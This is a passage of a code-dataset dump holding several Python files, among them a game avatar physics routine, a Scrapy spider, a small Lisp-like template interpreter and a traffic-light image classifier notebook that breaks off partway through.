self.remaining_jumps > 0:\n\t\t\t\t#add target jump velocity to body\n\t\t\t\tjumpVel = math.sqrt(2.0 * JUMP_HEIGHT * abs(self.scene.space.gravity.y))\n\t\t\t\tself.body.velocity.y = ground_velocity.y + jumpVel\n\t\t\t\tself.remaining_jumps -=1\n\t\t\n\t\t# if on ground\n\t\tif self.platformBody != None:\n\t\t\t# if slide key and on slope (normal is (0,1) when on level ground)\n\t\t\tif self.slide == True and (self.platformNormal.x / self.platformNormal.y) != 0.:\n\t\t\t\tself.feet.friction = 0\n\t\t\telse:\n\t\t\t\tself.feet.friction = abs(PLAYER_GROUND_ACCEL / self.scene.space.gravity.y)\n\t\t\tself.head.friciton = HEAD_FRICTION\n\t\t\t# apply target x velocity to surface velocity of feet..\n\t\t\tself.feet.surface_velocity = targetXVel, 0\n\t\telse:\n\t\t\tself.feet.friction,self.head.friction = 0,0\n\t\t\tself.body.apply_impulse((targetXVel/6,0))\n\t\t\t\n\t\t# fall rate limiter\n\t\tself.body.velocity.y = max(self.body.velocity.y, -FALL_VELOCITY) # clamp upwards as well?\n\t\t\t\n\t\tsuper(Avatar, self).update(dt)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n","sub_path":"game/avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300915230","text":"__author__ = 'student'\nimport numpy as np\nfrom matplotlib import mlab\nimport pylab\n\ntmin = -20.0\ntmax = 20.0\ndt = 0.01\ntlist = mlab.frange (tmin, tmax, dt)\n\npylab.ion()\n\nfor a in range (1000):\n ylist = [np.cos(2*t) for t in tlist]\n xlist = [np.sin(t+a/10) for t in tlist]\n pylab.clf()\n pylab.plot (xlist, ylist)\n pylab.draw()\n\npylab.close()","sub_path":"7no4.py","file_name":"7no4.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"433113620","text":"from scrapy import Spider, Request, Field, Item\nfrom scrapy.http import FormRequest\nfrom oldtimertrends.items import Car\n\nclass Lvacrawler(Spider):\n name = \"lva_quote\"\n start_urls = [\n 'https://www.lva-auto.fr/cote.php?idMarque=MA55&idModele=-1&rechercheType=1'\n ]\n\n def parse(self, response):\n auction_url = response.css('.link-result a::attr(href)').get()\n mycar = Car()\n for quote in response.css('ul.cote li'):\n mycar['auction_url'] = auction_url\n mycar['quote_id'] = auction_url.split(\"=\")[1] if mycar['auction_url'] else None\n \n \n\n next_page = response.css('a.nextItem ::attr(href)').get()\n\n print(next_page)\n if next_page != \"javascript:void()\":\n\n \n yield Request(response.urljoin(next_page), callback=self.parse, dont_filter=True)\n\n ","sub_path":"oldtimertrends/spiders/lvatrendsquote.py","file_name":"lvatrendsquote.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567555335","text":"import math\r\nfrom pteromyini.core.model import Model\r\nfrom pteromyini.interpreter.function import Function\r\nfrom pteromyini.interpreter.function_executor import FunctionExecutor, DefaultMethods, Methods\r\nfrom pteromyini.interpreter.heap import Heap\r\nfrom pteromyini.interpreter.parse_tools import Tools\r\nfrom pteromyini.interpreter.struct import Struct\r\nimport re\r\n\r\n\r\nclass ModelIsNoneException(Exception):\r\n pass\r\n\r\n\r\nclass Interpreter:\r\n def __init__(self, model: Model = None):\r\n self.set_model(model)\r\n\r\n def copy(self):\r\n return Interpreter(self._model)\r\n\r\n def set_model(self, model: Model):\r\n self._model = model\r\n\r\n def execute(self, src: str, methods: Methods = None, function_executor: FunctionExecutor = None):\r\n \"\"\"\r\n heap - not complete\r\n\r\n get code in str, interpreted and execute\r\n return result in string\r\n\r\n Syntax:\r\n {id} -> insert value from model \"model.get_value(id)\"\r\n (xpath (node attribute value)) -> execute xpath function with args: node, attribute, value\r\n (xpath (node attribute {id})) -> execute xpath function with args: node, attribute, value (get by id in model)\r\n * asfsdaf (random) fasdfd (random_str) afasdf -> asfsdaf 123 fasdfd some_random_string afasdf\r\n \"\"\"\r\n if function_executor is None:\r\n function_executor = self.build_executor(methods)\r\n if src[0:3] == src[-3:] == '\"\"\"':\r\n return src[3:-3]\r\n src = self._load_var(src, function_executor) # TODO: before paste var require verify on [\"()whitespace]\r\n text_and_code = Tools.split_to_text_and_code(src)\r\n results = []\r\n for item in text_and_code:\r\n if item[0] == '(':\r\n results.append(self._execute_code(item, function_executor))\r\n else:\r\n item_with_var = function_executor.heap.paste_vars(item)\r\n results.append(item_with_var)\r\n return results\r\n\r\n def _load_var(self, code, function_executor: FunctionExecutor) -> str:\r\n members = re.findall(r\"(? 0:\r\n raise ModelIsNoneException()\r\n if self._model is None:\r\n return code\r\n data = Struct(self._model.fields)\r\n for member in members:\r\n value = eval(f'data.{member[0][1:-1]}')\r\n # value = value.replace(')', '\\\\)').replace('(', '\\\\(')\r\n name = function_executor.heap.save_value(value)\r\n code = code.replace(member[0], name)\r\n code = code.replace('\\\\{', '{').replace('\\\\}', '}')\r\n return code\r\n\r\n def _execute_code(self, code, function_executor):\r\n return self.build_trees(code, function_executor).execute()\r\n\r\n def build_trees(self, code, function_executor):\r\n code_tuple = self.convert_to_tuple(code)\r\n return Function(code_tuple, function_executor)\r\n\r\n def convert_to_tuple(self, code: str):\r\n \"\"\"\r\n Convert like lisp code to python tuple\r\n :param code: like lisp (foo 123 (foo2 \"asdf\"))\r\n :return: tuple\r\n \"\"\"\r\n # find position \"string\" and escape charecters in code\r\n all_ignore = [(m.start(0), m.end(0)) for m in re.finditer(r'(\\\"[^\"]*\\\")|(\\\\\\()|(\\\\\\))', code)]\r\n all_ignore.append((len(code), (len(code)))) # it's for run last iteration or at least one\r\n last_end = 0 # index to start next iteration parsing code\r\n converted = '' # result tuple in repr (string) view\r\n last_escaped = False # mark if in previous iteration character is escaped\r\n\r\n # code array parsing\r\n for start, end in all_ignore:\r\n parentheses_space = code[last_end:start].replace('(', ' ( ').replace(')', ' ) ') # add space\r\n space_splt = re.compile(r\"\\s\").split(parentheses_space) # split by space, convert str to array\r\n space_splt = list(filter(lambda a: a.strip() != \"\", space_splt)) # remove empty item\r\n size = len(space_splt) - 1\r\n\r\n # add operators\r\n for counter, value in enumerate(space_splt):\r\n if value in [')', '(']:\r\n if value == ')':\r\n if (counter != size and space_splt[counter + 1] != ')') or \\\r\n (counter == size and start < len(code) - 1 and code[start] != ')'):\r\n converted = f\"{converted} {value},\"\r\n else:\r\n converted = f\"{converted} {value}\"\r\n if value == '(':\r\n converted = f\"{converted} {value}\"\r\n else:\r\n if last_escaped and code[last_end] != ' ':\r\n converted = f\"{converted[0:-2]}{value}',\"\r\n else:\r\n converted = f\"{converted} '{value}',\"\r\n last_escaped = False\r\n\r\n # add str or escaped\r\n if math.fabs(start - end) > 0:\r\n text = code[start:end]\r\n text = text.replace(\"'\", \"\\\\'\")\r\n if text[0] == '\\\\':\r\n text = text[1:]\r\n last_escaped = True\r\n if not last_escaped:\r\n if code[start] == code[end - 1] == '\"':\r\n converted = f\"{converted} '{text}',\"\r\n elif last_escaped:\r\n if code[end - 1 + start - end] not in [' ', '(', ')']:\r\n # check that char located in args, not independent\r\n converted = f\"{converted[0:-2]}{text}',\"\r\n else:\r\n converted = f\"{converted} '{text}',\"\r\n last_end = end\r\n r = eval(converted) # if one args in code it can return str\r\n if type(r) is not tuple:\r\n r = (r,)\r\n return r\r\n\r\n def build_executor(self, methods=None):\r\n _methods = [DefaultMethods()]\r\n if type(methods) is list:\r\n _methods.extend(methods)\r\n elif methods is not None:\r\n _methods.append(methods)\r\n executor = FunctionExecutor(self._model)\r\n for m in _methods:\r\n executor.bind_methods(m)\r\n return executor\r\n","sub_path":"custom_library/pteromyini/pteromyini/interpreter/interpreter.py","file_name":"interpreter.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"110081216","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ngraphics = np.load('graphics56.npy')\ngraphics = graphics[::-1]\nfig = plt.figure()\nax = fig.add_subplot(111)\nfig.suptitle('Snapshots of the street every 1000 time steps with occupancy rate 5/6\\nWhite is occupied Black is vacant')\nax.set_ylabel('Time')\nax.set_xlabel('Parking Space number')\nplt.ion()\nplt.imshow(graphics, cmap='gray', interpolation='none')\nplt.gca().invert_yaxis()\nplt.show()\nplt.savefig('spacesevery1000steps_OR56.png')","sub_path":"Spaces_Graphics.py","file_name":"Spaces_Graphics.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140113776","text":"\n# coding: utf-8\n\n# # Traffic Light Classifier\n# ---\n# \n# In this project, you’ll use your knowledge of computer vision techniques to build a classifier for images of traffic lights! You'll be given a dataset of traffic light images in which one of three lights is illuminated: red, yellow, or green.\n# \n# In this notebook, you'll pre-process these images, extract features that will help us distinguish the different types of images, and use those features to classify the traffic light images into three classes: red, yellow, or green. The tasks will be broken down into a few sections:\n# \n# 1. **Loading and visualizing the data**. \n# The first step in any classification task is to be familiar with your data; you'll need to load in the images of traffic lights and visualize them!\n# \n# 2. **Pre-processing**. \n# The input images and output labels need to be standardized. This way, you can analyze all the input images using the same classification pipeline, and you know what output to expect when you eventually classify a *new* image.\n# \n# 3. **Feature extraction**. \n# Next, you'll extract some features from each image that will help distinguish and eventually classify these images.\n# \n# 4. **Classification and visualizing error**. \n# Finally, you'll write one function that uses your features to classify *any* traffic light image. This function will take in an image and output a label. You'll also be given code to determine the accuracy of your classification model. \n# \n# 5. **Evaluate your model**.\n# To pass this project, your classifier must be >90% accurate and never classify any red lights as green; it's likely that you'll need to improve the accuracy of your classifier by changing existing features or adding new features. I'd also encourage you to try to get as close to 100% accuracy as possible!\n# \n# Here are some sample images from the dataset (from left to right: red, green, and yellow traffic lights):\n# \n# \n\n# ---\n# ### *Here's what you need to know to complete the project:*\n# \n# Some template code has already been provided for you, but you'll need to implement additional code steps to successfully complete this project. Any code that is required to pass this project is marked with **'(IMPLEMENTATION)'** in the header. There are also a couple of questions about your thoughts as you work through this project, which are marked with **'(QUESTION)'** in the header. Make sure to answer all questions and to check your work against the [project rubric](https://review.udacity.com/#!/rubrics/1213/view) to make sure you complete the necessary classification steps!\n# \n# Your project submission will be evaluated based on the code implementations you provide, and on two main classification criteria.\n# Your complete traffic light classifier should have:\n# 1. **Greater than 90% accuracy**\n# 2. ***Never* classify red lights as green**\n# \n\n# # 1. Loading and Visualizing the Traffic Light Dataset\n# \n# This traffic light dataset consists of 1484 number of color images in 3 categories - red, yellow, and green. As with most human-sourced data, the data is not evenly distributed among the types. There are:\n# * 904 red traffic light images\n# * 536 green traffic light images\n# * 44 yellow traffic light images\n# \n# *Note: All images come from this [MIT self-driving car course](https://selfdrivingcars.mit.edu/) and are licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](https://creativecommons.org/licenses/by-sa/4.0/).*\n\n# ### Import resources\n# \n# Before you get started on the project code, import the libraries and resources that you'll need.\n\n# In[346]:\n\n\n\"\"\"Traffic Light Classifier.\nComputer vision techniques to build a classifier,\nfor images of traffic lights. \n\"\"\" \nimport cv2 # computer vision library\nimport helpers # helper functions\nimport random # for random test images\nimport scipy.stats # mathematical statistics --> adding this\nimport numpy as np # numpy library\nimport matplotlib.pyplot as plt # plot images\nimport matplotlib.image as mpimg # for loading in images\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# ## Training and Testing Data\n# \n# All 1484 of the traffic light images are separated into training and testing datasets. \n# \n# * 80% of these images are training images, for you to use as you create a classifier.\n# * 20% are test images, which will be used to test the accuracy of your classifier.\n# * All images are pictures of 3-light traffic lights with one light illuminated.\n# \n# ## Define the image directories\n# \n# First, we set some variables to keep track of some where our images are stored:\n# \n# IMAGE_DIR_TRAINING: the directory where our training image data is stored\n# IMAGE_DIR_TEST: the directory where our test image data is stored\n\n# In[347]:\n\n\n\"\"\"Datasets.\nDefine the image directories.\n\"\"\"\n# Image data directories\nIMAGE_DIR_TRAINING = \"traffic_light_images/training/\"\nIMAGE_DIR_TEST = \"traffic_light_images/test/\"\n\n\n# ## Load the datasets\n# \n# These first few lines of code will load the training traffic light images and store all of them in a variable, `IMAGE_LIST`. This list contains the images and their associated label (\"red\", \"yellow\", \"green\"). \n# \n# You are encouraged to take a look at the `load_dataset` function in the helpers.py file. This will give you a good idea about how lots of image files can be read in from a directory using the [glob library](https://pymotw.com/2/glob/). The `load_dataset` function takes in the name of an image directory and returns a list of images and their associated labels. \n# \n# For example, the first image-label pair in `IMAGE_LIST` can be accessed by index: \n# ``` IMAGE_LIST[0][:]```.\n# \n\n# In[348]:\n\n\n\"\"\"Loading Datasets.\nUsing the load_dataset function in helpers.py file.\n\"\"\"\n# Load training data\nIMAGE_LIST = helpers.load_dataset(IMAGE_DIR_TRAINING)\n\n\n# ## Visualize the Data\n# \n# The first steps in analyzing any dataset are to 1. load the data and 2. look at the data. Seeing what it looks like will give you an idea of what to look for in the images, what kind of noise or inconsistencies you have to deal with, and so on. This will help you understand the image dataset, and **understanding a dataset is part of making predictions about the data**.\n\n# ---\n# ### Visualize the input images\n# \n# Visualize and explore the image data! Write code to display an image in `IMAGE_LIST`:\n# * Display the image\n# * Print out the shape of the image \n# * Print out its corresponding label\n# \n# See if you can display at least one of each type of traffic light image – red, green, and yellow — and look at their similarities and differences.\n\n# In[349]:\n\n\n\"\"\"Visualize the Images from IMAGE_LIST.\n1). Display an image.\n2). Print out the shape of the image.\n3). Print out its corresponding label.\n4). Display the example of each image, Red, Yellow, Green.\n\"\"\" \n# ---------------- Mapping ----------------\n# Red Traffic from array 0 until 722\n# Yellow Traffic from array 723 until 757\n# Green Traffic from array 758 until 1186\n# -----------------------------------------\n# Image Array\n# Change this value to check the others\nimg_array = 728\n\n# Image & Label Variables\nvar_image = IMAGE_LIST[img_array][0]\nvar_label = IMAGE_LIST[img_array][1]\n\n# 1). Display the Image\nf, (fg1) = plt.subplots(1, 1, figsize=(10,5))\nfg1.set_title(str(var_label))\nfg1.imshow(var_image)\n\n# 2). Print out the shape of the image\nprint(\"Image Shape:\", var_image.shape)\n\n# 3). Print out its corresponding label\nprint(\"Image Label:\", var_label)\n\n# 4). Display the example of each image, Red, Yellow, Green\nf, (fg1, fg2, fg3) = plt.subplots(1, 3, figsize=(10,5))\nfg1.set_title('Red')\nfg1.imshow(IMAGE_LIST[3][0])\nfg2.set_title('Yellow')\nfg2.imshow(IMAGE_LIST[737][0])\nfg3.set_title('Green')\nfg3.imshow(IMAGE_LIST[777][0])\n\n\n# # 2. Pre-process the Data\n# \n# After loading in each image, you have to standardize the input and output!\n# \n# ### Input\n# \n# This means that every input image should be in the same format, of the same size, and so on. We'll be creating features by performing the same analysis on every picture, and for a classification task like this, it's important that **similar images create similar features**! \n# \n# ### Output\n# \n# We also need the output to be a label that is easy to read and easy to compare with other labels. It is good practice to convert categorical data like \"red\" and \"green\" to numerical data.\n# \n# A very common classification output is a 1D list that is the length of the number of classes - three in the case of red, yellow, and green lights - with the values 0 or 1 indicating which class a certain image is. For example, since we have three classes (red, yellow, and green), we can make a list with the order: [red value, yellow value, green value]. In general, order does not matter, we choose the order [red value, yellow value, green value] in this case to reflect the position of each light in descending vertical order.\n# \n# A red light should have the label: [1, 0, 0]. Yellow should be: [0, 1, 0]. Green should be: [0, 0, 1]. These labels are called **one-hot encoded labels**.\n# \n# *(Note: one-hot encoding will be especially important when you work with [machine learning algorithms](https://machinelearningmastery.com/how-to-one-hot-encode-sequence-data-in-python/)).*\n# \n# \n# \n\n# ---\n# \n# ### (IMPLEMENTATION): Standardize the input images\n# \n# * Resize each image to the desired input size: 32x32px.\n# * (Optional) You may choose to crop, shift, or rotate the images in this step as well.\n# \n# It's very common to have square input sizes that can be rotated (and remain the same size), and analyzed in smaller, square patches. It's also important to make all your images the same size so that they can be sent through the same pipeline of classification steps!\n\n# In[350]:\n\n\ndef standardize_input(image):\n \"\"\"Standardize Image.\n This function take an RGB image and return a standardized version.\n Resizing each image into 32x32 pixel, and adjust to 24x16 pixel.\n \"\"\"\n # Return an array copy of the image\n clone_image = np.copy(image)\n \n # Resize to 32x32 pixel\n resize_image = cv2.resize(clone_image, (32, 32))\n \n # Adjusting image to 24x16 pixel\n row_crop = 4 # 32-4-4 = 24\n col_crop = 8 # 32-8-8 = 16\n standard_image = resize_image[row_crop:-row_crop, col_crop:-col_crop, :]\n \n # Return result\n return standard_image \n\n\n# ## Standardize the output\n# \n# With each loaded image, we also specify the expected output. For this, we use **one-hot encoding**.\n# \n# * One-hot encode the labels. To do this, create an array of zeros representing each class of traffic light (red, yellow, green), and set the index of the expected class number to 1. \n# \n# Since we have three classes (red, yellow, and green), we have imposed an order of: [red value, yellow value, green value]. To one-hot encode, say, a yellow light, we would first initialize an array to [0, 0, 0] and change the middle value (the yellow value) to 1: [0, 1, 0].\n# \n\n# ---\n# \n# ### (IMPLEMENTATION): Implement one-hot encoding\n\n# In[351]:\n\n\ndef one_hot_encode(label):\n \"\"\"One-Hot Encoding.\n This function given a label - \"red\", \"green\", or \"yellow\",\n returning a one-hot encoded label.\n One-Hot Encode of \"red\" return: [1, 0, 0]\n One-Hot Encode of \"yellow\" return: [0, 1, 0]\n One-Hot Encode of \"green\" return: [0, 0, 1]\n \"\"\"\n # Init Variable\n one_hot_encoded = []\n \n # Processing\n if label == \"red\":\n one_hot_encoded = [1, 0, 0]\n elif label == \"yellow\":\n one_hot_encoded = [0, 1, 0]\n elif label == \"green\":\n one_hot_encoded = [0, 0, 1]\n else:\n one_hot_encoded = [0, 0, 0]\n \n # Return result\n return one_hot_encoded\n\n\n# ### Testing as you Code\n# \n# After programming a function like this, it's a good idea to test it, and see if it produces the expected output. **In general, it's good practice to test code in small, functional pieces, after you write it**. This way, you can make sure that your code is correct as you continue to build a classifier, and you can identify any errors early on so that they don't compound.\n# \n# All test code can be found in the file `test_functions.py`. You are encouraged to look through that code and add your own testing code if you find it useful!\n# \n# One test function you'll find is: `test_one_hot(self, one_hot_function)` which takes in one argument, a one_hot_encode function, and tests its functionality. If your one_hot_label code does not work as expected, this test will print ot an error message that will tell you a bit about why your code failed. Once your code works, this should print out TEST PASSED.\n\n# In[352]:\n\n\n\"\"\"Testing One-Hot Encoding.\nTo see if it produces the expected output.\n\"\"\"\n# Importing the tests\nimport test_functions\ntests = test_functions.Tests()\n\n# Test for one_hot_encode function\ntests.test_one_hot(one_hot_encode)\n\n\n# ## Construct a `STANDARDIZED_LIST` of input images and output labels.\n# \n# This function takes in a list of image-label pairs and outputs a **standardized** list of resized images and one-hot encoded labels.\n# \n# This uses the functions you defined above to standardize the input and output, so those functions must be complete for this standardization to work!\n# \n\n# In[353]:\n\n\ndef standardize(image_list):\n \"\"\"Standardized List of Input Images and Output Labels.\n This function takes in a list of image-label pairs and outputs,\n a standardized list of resized images and one-hot encoded labels.\n \"\"\" \n # Empty image data array\n standard_list = []\n\n # Iterate through all the image-label pairs\n for item in image_list:\n image = item[0]\n label = item[1]\n\n # Standardize the image\n standardized_im = standardize_input(image)\n\n # One-hot encode the label\n one_hot_label = one_hot_encode(label) \n\n # Append the image, and it's one hot encoded label to the full, processed list of image data \n standard_list.append((standardized_im, one_hot_label))\n \n # Return result\n return standard_list\n\n# Standardize all of training images\nSTANDARDIZED_LIST = standardize(IMAGE_LIST)\n\n\n# ## Visualize the standardized data\n# \n# Display a standardized image from STANDARDIZED_LIST and compare it with a non-standardized image from IMAGE_LIST. Note that their sizes and appearance are different!\n\n# In[354]:\n\n\n\"\"\"Visualize the Standardized Images.\nDisplay a standardized image from STANDARDIZED_LIST,\nand compare it with a non-standardized image from IMAGE_LIST. \n\"\"\" \n# ---------------- Mapping ----------------\n# Red Traffic from array 0 until 722\n# Yellow Traffic from array 723 until 757\n# Green Traffic from array 758 until 1186\n# -----------------------------------------\n# Image Array\n# Change this value to check the others\nimg_array = 1000\n\n# Image & Label from IMAGE_LIST\nori_image = IMAGE_LIST[img_array][0]\nori_label = IMAGE_LIST[img_array][1]\n\n# Image & Label from STANDARDIZED_LIST\nstd_image = STANDARDIZED_LIST[img_array][0]\nstd_label = STANDARDIZED_LIST[img_array][1]\n\n# Print out the shape of the image from IMAGE_LIST\nprint(\"Image Shape - Original:\", ori_image.shape)\n\n# Print out the shape of the image from STANDARDIZED_LIST\nprint(\"Image Shape - Standard:\", std_image.shape)\n\n# Print out its corresponding label from IMAGE_LIST\nprint(\"Image Label - Ortiginal:\", ori_label)\n\n# Print out its corresponding label from STANDARDIZED_LIST\nprint(\"Image Label - Standard:\", std_label)\n\n# 4). Display the example of each image, Red, Yellow, Green\nf, (fg1, fg2) = plt.subplots(1, 2, figsize=(10,5))\nfg1.set_title('Original')\nfg1.imshow(ori_image)\nfg2.set_title('Standard')\nfg2.imshow(std_image)\n\n\n# # 3. Feature Extraction\n# \n# You'll be using what you now about color spaces, shape analysis, and feature construction to create features that help distinguish and classify the three types of traffic light images.\n# \n# You'll be tasked with creating **one feature** at a minimum (with the option to create more). The required feature is **a brightness feature using HSV color space**:\n# \n# 1. A brightness feature.\n# - Using HSV color space, create a feature that helps you identify the 3 different classes of traffic light.\n# - You'll be asked some questions about what methods you tried to locate this traffic light, so, as you progress through this notebook, always be thinking about your approach: what works and what doesn't?\n# \n# 2. (Optional): Create more features! \n# \n# Any more features that you create are up to you and should improve the accuracy of your traffic light classification algorithm! One thing to note is that, to pass this project you must **never classify a red light as a green light** because this creates a serious safety risk for a self-driving car. To avoid this misclassification, you might consider adding another feature that specifically distinguishes between red and green lights.\n# \n# These features will be combined near the end of his notebook to form a complete classification algorithm.\n\n# ## Creating a brightness feature \n# \n# There are a number of ways to create a brightness feature that will help you characterize images of traffic lights, and it will be up to you to decide on the best procedure to complete this step. You should visualize and test your code as you go.\n# \n# Pictured below is a sample pipeline for creating a brightness feature (from left to right: standardized image, HSV color-masked image, cropped image, brightness feature):\n# \n# \n# \n\n# ## RGB to HSV conversion\n# \n# Below, a test image is converted from RGB to HSV colorspace and each component is displayed in an image.\n\n# In[355]:\n\n\n\"\"\"RGB to HSV Conversion.\nConvert and image to HSV colorspace.\nVisualize the individual color channels,\nand display each Histogram of H, S, V. \n\"\"\" \n# ---------------- Mapping ----------------\n# Red Traffic from array 0 until 722\n# Yellow Traffic from array 723 until 757\n# Green Traffic from array 758 until 1186\n# -----------------------------------------\n# Image Array\n# Change this value to check the others\nimg_array = 1000\n\n# Image & Label from IMAGE_LIST\nori_image = IMAGE_LIST[img_array][0]\nori_label = IMAGE_LIST[img_array][1]\n\n# Image & Label from STANDARDIZED_LIST\nstd_image = STANDARDIZED_LIST[img_array][0]\nstd_label = STANDARDIZED_LIST[img_array][1]\n\n# Convert to HSV\nhsv_conversion = cv2.cvtColor(std_image, cv2.COLOR_RGB2HSV)\n\n# HSV channels\nh_channel = hsv_conversion[:,:,0]\ns_channel = hsv_conversion[:,:,1]\nv_channel = hsv_conversion[:,:,2]\n\n# Plot the original image and the three channels\nf, (fg1, fg2, fg3, fg4) = plt.subplots(1, 4, figsize=(10,5))\nfg1.set_title('Standard Image')\nfg1.imshow(std_image)\nfg2.set_title('H Channel')\nfg2.imshow(h_channel)\nfg3.set_title('S Channel')\nfg3.imshow(s_channel)\nfg4.set_title('V Channel')\nfg4.imshow(v_channel)\n\n# Histogram of HSV for each channel\nh_histogram = np.histogram(hsv[:,:,0], bins=32, range=(0, 255))\ns_histogram = np.histogram(hsv[:,:,1], bins=32, range=(0, 255))\nv_histogram = np.histogram(hsv[:,:,2], bins=32, range=(0, 255))\n\n# Generating bin centers of Histogram\nbin_edges = h_histogram[1]\nbin_centers = (bin_edges[1:] + bin_edges[0:len(bin_edges) - 1]) / 2\n\n# Plot each chanel of the HSV Histogram \nfig = plt.figure(figsize=(10,3))\nplt.subplot(131)\nplt.bar(bin_centers, h_histogram[0])\nplt.xlim(0, 180)\nplt.title('H Histogram')\nplt.subplot(132)\nplt.bar(bin_centers, s_histogram[0])\nplt.xlim(0, 256)\nplt.title('S Histogram')\nplt.subplot(133)\nplt.bar(bin_centers, v_histogram[0])\nplt.xlim(0, 256)\nplt.title('V Histogram')\nplt.show()\n\n\n# ---\n# \n# ### (IMPLEMENTATION): Create a brightness feature that uses HSV color space\n# \n# Write a function that takes in an RGB image and returns a 1D feature vector and/or single value that will help classify an image of a traffic light. The only requirement is that this function should apply an HSV colorspace transformation, the rest is up to you. \n# \n# From this feature, you should be able to estimate an image's label and classify it as either a red, green, or yellow traffic light. You may also define helper functions if they simplify your code.\n\n# In[359]:\n\n\n\"\"\"Extract Features.\nThis function takes in an RGB image,\nand outputs a feature vector and value.\nThis feature use HSV colorspace values.\n\"\"\"\ndef extract_features(rgb_image):\n # Using HSV color space\n hsv_image = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2HSV)\n \n # Getting where is the light brightest spot\n mask_bottom = np.array([0,27,123])\n mask_top = np.array([178,236,254])\n masking = cv2.inRange(hsv_image, mask_bottom, mask_top)\n feature_hsv = cv2.bitwise_and(hsv_image, hsv_image, mask = masking)\n \n # Masking range of Red Color\n lower_red = np.array([161])\n upper_red = np.array([203])\n red_masking = cv2.inRange(feature_hsv[:,:,0], lower_red, upper_red)\n \n # Masking range of Yellow Color\n lower_yellow = np.array([9])\n upper_yellow = np.array([31])\n yellow_masking = cv2.inRange(feature_hsv[:,:,0], lower_yellow, upper_yellow)\n \n # Masking range of Green Color\n lower_green = np.array([79]) \n upper_green = np.array([101])\n green_masking = cv2.inRange(feature_hsv[:,:,0], lower_green, upper_green)\n \n # Combine masks\n combine_masking = red_masking + yellow_masking + green_masking\n \n # Copy Hue channel\n feature = np.copy(hsv_image[:,:,0])\n feature[combine_masking == 0] = [0]\n \n # Return result\n return feature\n\n\n# ## (Optional) Create more features to help accurately label the traffic light images\n\n# In[362]:\n\n\n\"\"\"Additional Features.\nThis function based on mathematical statistics functions.\nSearching of average value (Mean),\nand most common value (Mode).\n\"\"\"\ndef mode_value(hsv_image):\n total_mode = scipy.stats.mode(hsv_image[np.nonzero(hsv_image)])[0]\n return total_mode[0] if len(total_mode) > 0 else 0\n\ndef median_value(hsv_image):\n nonzero = hsv_image[np.nonzero(hsv_image)]\n if len(nonzero) > 0:\n return np.median(hsv_image[np.nonzero(hsv_image)])\n return 0\n\n\n# ## (QUESTION 1): How do the features you made help you distinguish between the 3 classes of traffic light images?\n\n# **Answer:**\n# 1. We must resize all of the image into the same pixel size.\n# 2. Next, convert RGB into HSV value.\n# 3. From HSV value, we can distinguish which one red, yellow, or green, by masking them.\n# 4. Finally, we can clasify by using threshold value between red, yellow, and green.\n\n# # 4. Classification and Visualizing Error\n# \n# Using all of your features, write a function that takes in an RGB image and, using your extracted features, outputs whether a light is red, green or yellow as a one-hot encoded label. This classification function should be able to classify any image of a traffic light!\n# \n# You are encouraged to write any helper functions or visualization code that you may need, but for testing the accuracy, make sure that this `estimate_label` function returns a one-hot encoded label.\n\n# ## ------------------------------------------------\n# \n# ### (IMPLEMENTATION): Build a complete classifier \n\n# In[363]:\n\n\n\"\"\"Traffic Light Classifier.\nThis function take in RGB image input.\nExtract features from the RGB image and\nuse those features to classify the image,\nand output a one-hot encoded label.\n\"\"\"\ndef estimate_label(rgb_image):\n # Init variable\n predicted_label = []\n \n # Extract Features\n masked_image = extract_features(rgb_image)\n mode = mode_value(masked_image)\n median = median_value(masked_image)\n \n # Threshold classification between red, yellow and green\n if (median >= 162.) or (mode >= 176.):\n predicted_label = one_hot_encode(\"red\") \n elif (median >= 79. and median <= 161.):\n predicted_label = one_hot_encode(\"green\")\n elif (mode == 11.) and (median == 11.): # tricky threshold, worked only for this dataset\n predicted_label = one_hot_encode(\"green\") \n else:\n predicted_label = one_hot_encode(\"yellow\") # all unidentified, classify as yellow (safe)\n \n # Return result\n return predicted_label\n\n\n# ## Testing the classifier\n# \n# Here is where we test your classification algorithm using our test set of data that we set aside at the beginning of the notebook! This project will be complete once you've pogrammed a \"good\" classifier.\n# \n# A \"good\" classifier in this case should meet the following criteria (and once it does, feel free to submit your project):\n# 1. Get above 90% classification accuracy.\n# 2. Never classify a red light as a green light. \n# \n# ### Test dataset\n# \n# Below, we load in the test dataset, standardize it using the `standardize` function you defined above, and then **shuffle** it; this ensures that order will not play a role in testing accuracy.\n# \n\n# In[364]:\n\n\n\"\"\"Testing the classifier.\nUsing the load_dataset function in helpers.py\nWe load in the test dataset, standardize it, and then shuffle it.\nThis ensures that order will not play a role in testing accuracy.\n\"\"\"\n# Load test data\nTEST_IMAGE_LIST = helpers.load_dataset(IMAGE_DIR_TEST)\n\n# Standardize the test data\nSTANDARDIZED_TEST_LIST = standardize(TEST_IMAGE_LIST)\n\n# Shuffle the standardized test data\nrandom.shuffle(STANDARDIZED_TEST_LIST)\n\n\n# ## Determine the Accuracy\n# \n# Compare the output of your classification algorithm (a.k.a. your \"model\") with the true labels and determine the accuracy.\n# \n# This code stores all the misclassified images, their predicted labels, and their true labels, in a list called `MISCLASSIFIED`. This code is used for testing and *should not be changed*.\n\n# In[365]:\n\n\n\"\"\"Determine the Accuracy.\nConstructs a list of misclassified images given a list of test images and their labels.\nThis will throw an AssertionError if labels are not standardized (one-hot encoded).\nAnd check the accuracy of this classifier.\n\"\"\" \ndef get_misclassified_images(test_images):\n # Track misclassified images by placing them into a list\n misclassified_images_labels = []\n\n # Iterate through all the test images\n # Classify each image and compare to the true label\n for image in test_images:\n # Get true data\n im = image[0]\n true_label = image[1]\n assert(len(true_label) == 3), \"The true_label is not the expected length (3).\"\n\n # Get predicted label 